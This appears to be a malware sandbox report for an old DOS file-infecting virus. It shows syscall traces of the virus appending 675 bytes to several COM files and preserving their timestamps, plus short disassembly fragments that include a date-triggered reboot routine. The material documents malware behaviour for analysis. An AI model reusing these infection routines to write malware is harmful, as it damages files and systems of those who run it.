Sample viewer

vx.netlux.org/Virus.DOS.IVP.TRG.675

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:35:58.792969898Z 26 PC: 12c4f | Set disk transfer address
2018-12-17T22:35:58.794651204Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:35:58.795674163Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:35:58.796769253Z 71 PC: 12aaa | Get current directory
2018-12-17T22:35:58.799995465Z 78 PC: 12b32 | Find first file
2018-12-17T22:35:58.80566737Z 78 PC: 12b32 | Find first file
2018-12-17T22:35:58.816105148Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:35:58.828019239Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:58.834195887Z 62 PC: 12b51 | Close file
2018-12-17T22:35:58.835895444Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:58.85256228Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:35:58.859101318Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:58.861736997Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:58.86373892Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-17T22:35:58.8662493Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-17T22:35:58.874840628Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:58.87743282Z 62 PC: 12c38 | Close file
2018-12-17T22:35:58.88503878Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:58.891363417Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:58.895039455Z 61 PC: 12c58 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:35:58.901423829Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:58.905569979Z 62 PC: 12b51 | Close file
2018-12-17T22:35:58.907286917Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:58.917771637Z 61 PC: 12c58 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:35:58.924197475Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:58.927298181Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:58.928731077Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-17T22:35:58.931055136Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-17T22:35:58.939517123Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:58.940903827Z 62 PC: 12c38 | Close file
2018-12-17T22:35:58.948265532Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:58.959349751Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:58.962007048Z 61 PC: 12c58 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:35:58.968355294Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:58.974830278Z 62 PC: 12b51 | Close file
2018-12-17T22:35:58.976631829Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:58.986338818Z 61 PC: 12c58 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:35:58.993001653Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:58.997863298Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:58.999217531Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-17T22:35:59.001805376Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-17T22:35:59.010644592Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:59.011695658Z 62 PC: 12c38 | Close file
2018-12-17T22:35:59.016561527Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.024800199Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:59.026463099Z 61 PC: 12c58 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:35:59.030568359Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:59.034951554Z 62 PC: 12b51 | Close file
2018-12-17T22:35:59.03673916Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.046465208Z 61 PC: 12c58 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:35:59.053433277Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:59.05635625Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:59.057592934Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-17T22:35:59.060328716Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-17T22:35:59.068480756Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:59.069813896Z 62 PC: 12c38 | Close file
2018-12-17T22:35:59.077705125Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.089919864Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:59.092338597Z 61 PC: 12c58 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:35:59.099196326Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:59.105175033Z 62 PC: 12b51 | Close file
2018-12-17T22:35:59.106837809Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.112486318Z 61 PC: 12c58 | Open file (Filename = 'PRINTA~1.COM�')
2018-12-17T22:35:59.116937237Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 2)
2018-12-17T22:35:59.119921648Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:59.121658929Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-17T22:35:59.124440785Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 2)
2018-12-17T22:35:59.144622176Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:59.146492385Z 62 PC: 12c38 | Close file
2018-12-17T22:35:59.148114297Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.152892676Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:59.157467537Z 61 PC: 12c58 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:35:59.163799356Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:35:59.169875565Z 62 PC: 12b51 | Close file
2018-12-17T22:35:59.172517704Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.178885437Z 61 PC: 12c58 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:35:59.182953599Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 2)
2018-12-17T22:35:59.185053302Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:59.186029711Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-17T22:35:59.188207869Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 2)
2018-12-17T22:35:59.195493582Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:59.197066327Z 62 PC: 12c38 | Close file
2018-12-17T22:35:59.204796236Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.217229696Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:59.221608405Z 61 PC: 12c58 | Open file (Filename = 'PAH.COM')
2018-12-17T22:35:59.227039899Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:35:59.231427564Z 62 PC: 12b51 | Close file
2018-12-17T22:35:59.232682227Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.238998665Z 61 PC: 12c58 | Open file (Filename = 'PAH.COM')
2018-12-17T22:35:59.243575503Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 2)
2018-12-17T22:35:59.246294536Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:59.247705306Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-17T22:35:59.249678767Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 2)
2018-12-17T22:35:59.255076725Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:59.256456342Z 62 PC: 12c38 | Close file
2018-12-17T22:35:59.264253754Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.273726731Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:59.276053145Z 61 PC: 12c58 | Open file (Filename = 'TEST.COM')
2018-12-17T22:35:59.287766955Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:35:59.293912019Z 62 PC: 12b51 | Close file
2018-12-17T22:35:59.29552926Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:59.298098543Z 59 PC: 12ac0 | Change current directory
2018-12-17T22:35:59.302013295Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-17T22:35:59.303982064Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:35:59.305705801Z 59 PC: 12af3 | Change current directory
2018-12-17T22:35:59.307251624Z 26 PC: 12c4f | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:42.88786344Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:42.890356176Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:42.891805387Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:42.893194968Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:42.89722716Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:42.903055047Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:42.9110957Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:42.918676661Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:42.925366831Z 62 PC: 12b51 | Close file
2018-12-25T11:59:42.927475238Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:42.951680142Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:42.962698267Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:42.965599537Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:42.967324262Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:42.970995164Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:42.979746367Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:42.981617116Z 62 PC: 12c38 | Close file
2018-12-25T11:59:42.99063798Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.0011378Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.004091633Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.011707205Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.017982837Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.019757482Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.030904577Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.037399773Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.040143956Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.043003275Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.045580442Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.053845418Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.056122989Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.0637151Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.072615761Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.075398394Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.082150993Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.088695096Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.090674995Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.101435835Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.107882932Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.110492612Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.11294717Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.115893532Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.124729631Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.127490677Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.137099159Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.14677342Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.149759729Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.157354223Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.163948349Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.167118484Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.178014183Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.190345591Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.197817623Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.199958056Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.202733017Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.211038497Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.213987128Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.221840889Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.22978757Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.232492121Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.236596796Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.240589092Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.242671608Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.246922409Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.253083985Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.255853482Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.257073022Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.258780439Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.266956213Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.268104885Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.269538555Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.272778391Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.276665283Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.280529604Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.285079861Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.286726757Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.29994626Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.307413767Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.310335893Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.312030988Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.3154903Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.325467317Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.326661721Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.332928729Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.339045715Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.341514647Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.348237148Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.356625317Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.358647433Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.36857853Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.380069497Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.386754548Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.388192473Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.390833563Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.399275601Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.400953842Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.4064698Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.412986527Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.415218098Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.419611595Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.42373982Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.425115664Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.427163236Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:43.42976366Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:43.431519973Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.432819955Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:43.434104469Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:42.895882053Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:42.898950977Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:42.901158052Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:42.902078389Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:42.905963641Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:42.909688428Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:42.916274676Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:42.923909561Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:42.92801923Z 62 PC: 12b51 | Close file
2018-12-25T11:59:42.929181422Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:42.951792025Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:42.963584884Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:42.971026208Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:42.972607595Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:42.978553492Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:42.987325675Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:42.989104008Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.005801786Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.018853799Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.021671305Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.029224617Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.035528783Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.037228136Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.047471429Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.05481298Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.057420547Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.059030314Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.061610559Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.069798081Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.071935704Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.079466432Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.090106343Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.093307157Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.100516831Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.112734106Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.114896382Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.12562177Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.132016898Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.134708502Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.136887515Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.139446492Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.14782653Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.150947083Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.15859123Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.168211817Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.172125004Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.178642516Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.184963594Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.187195571Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.197077512Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.203902311Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.20795891Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.209697013Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.212529117Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.223340228Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.225342653Z 62 PC: 12c38 | Close file (See above)
